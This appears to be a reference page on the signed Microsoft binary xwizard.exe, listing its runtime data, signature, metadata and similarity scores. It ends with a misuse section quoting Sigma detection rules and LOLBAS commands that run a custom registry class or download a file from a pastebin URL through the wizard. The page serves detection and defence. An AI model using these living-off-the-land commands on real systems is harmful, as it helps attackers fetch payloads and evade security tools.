xwizard.exe

  • File Path: C:\Windows\SysWOW64\xwizard.exe
  • Description: Extensible Wizards Host Process

Hashes

Runtime Data

Open Handles:

Path Type
(R-D) C:\Windows\Fonts\StaticCache.dat File
(R-D) C:\Windows\System32\en-US\imageres.dll.mui File
(R-D) C:\Windows\SysWOW64\en-US\xwizard.exe.mui File
(RW-) C:\Users\user File
(RW-) C:\Windows File
(RW-) C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.1518_none_261b62a767ca4e6d File
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000004.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000004.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2.ro Section
\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 Section
\BaseNamedObjects\NLS_CodePage_437_3_2_0_0 Section
\Sessions\2\Windows\Theme2131664586 Section
\Windows\Theme966197582 Section

Loaded Modules:

Path
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32\wow64.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll
C:\Windows\SysWOW64\xwizard.exe

Signature

  • Status: Signature verified.
  • Serial: 33000001C422B2F79B793DACB20000000001C4
  • Thumbprint: AE9C1AE54763822EEC42474983D8B635116C8452
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: xwizard.exe.mui
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.17763.1 (WinBuild.160101.0800)
  • Product Version: 10.0.17763.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 32-bit

File Scan

  • VirusTotal Detections: 0/70
  • VirusTotal Link: https://www.virustotal.com/gui/file/5ce0b07dbc12f4f9263376047a7a2f269958df61e1510ac3b817796410cc2b00/detection/

File Similarity (ssdeep match)

File Score
C:\Windows\system32\ComputerDefaults.exe 52
C:\WINDOWS\system32\ComputerDefaults.exe 47
C:\WINDOWS\system32\ComputerDefaults.exe 58
C:\Windows\system32\ComputerDefaults.exe 49
C:\windows\system32\ComputerDefaults.exe 63
C:\Windows\system32\ComputerDefaults.exe 49
C:\Windows\system32\xwizard.exe 54
C:\windows\system32\xwizard.exe 54
C:\Windows\system32\xwizard.exe 46
C:\WINDOWS\system32\xwizard.exe 49
C:\WINDOWS\system32\xwizard.exe 50
C:\Windows\system32\xwizard.exe 57
C:\windows\SysWOW64\ComputerDefaults.exe 57
C:\WINDOWS\SysWOW64\ComputerDefaults.exe 47
C:\Windows\SysWOW64\ComputerDefaults.exe 60
C:\WINDOWS\SysWOW64\ComputerDefaults.exe 40
C:\Windows\SysWOW64\ComputerDefaults.exe 55
C:\Windows\SysWOW64\ComputerDefaults.exe 49
C:\WINDOWS\SysWOW64\xwizard.exe 65
C:\Windows\SysWOW64\xwizard.exe 63
C:\windows\SysWOW64\xwizard.exe 54
C:\Windows\SysWOW64\xwizard.exe 58
C:\WINDOWS\SysWOW64\xwizard.exe 69

Possible Misuse

The following table contains possible examples of xwizard.exe being misused. While xwizard.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma proc_creation_win_class_exec_xwizard.yml title: Custom Class Execution via Xwizard DRL 1.0
sigma proc_creation_win_class_exec_xwizard.yml description: Detects the execution of the Xwizard tool with specific arguments which are utilized to run custom class properties. DRL 1.0
sigma proc_creation_win_class_exec_xwizard.yml - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ DRL 1.0
sigma proc_creation_win_class_exec_xwizard.yml Image|endswith: '\xwizard.exe' DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml title: Xwizard DLL Sideloading DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml description: Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml Image|endswith: '\xwizard.exe' DRL 1.0
LOLBAS Xwizard.yml Name: Xwizard.exe
LOLBAS Xwizard.yml - Command: xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}
LOLBAS Xwizard.yml Description: Xwizard.exe running a custom class that has been added to the registry.
LOLBAS Xwizard.yml - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}
LOLBAS Xwizard.yml Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switches prevent an error message in later Windows 10 builds.
LOLBAS Xwizard.yml - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
LOLBAS Xwizard.yml Description: Xwizard.exe uses the RemoteApp and Desktop Connections wizard to download a file.
LOLBAS Xwizard.yml - Path: C:\Windows\System32\xwizard.exe
LOLBAS Xwizard.yml - Path: C:\Windows\SysWOW64\xwizard.exe

MIT License. Copyright (c) 2020-2021 Strontic.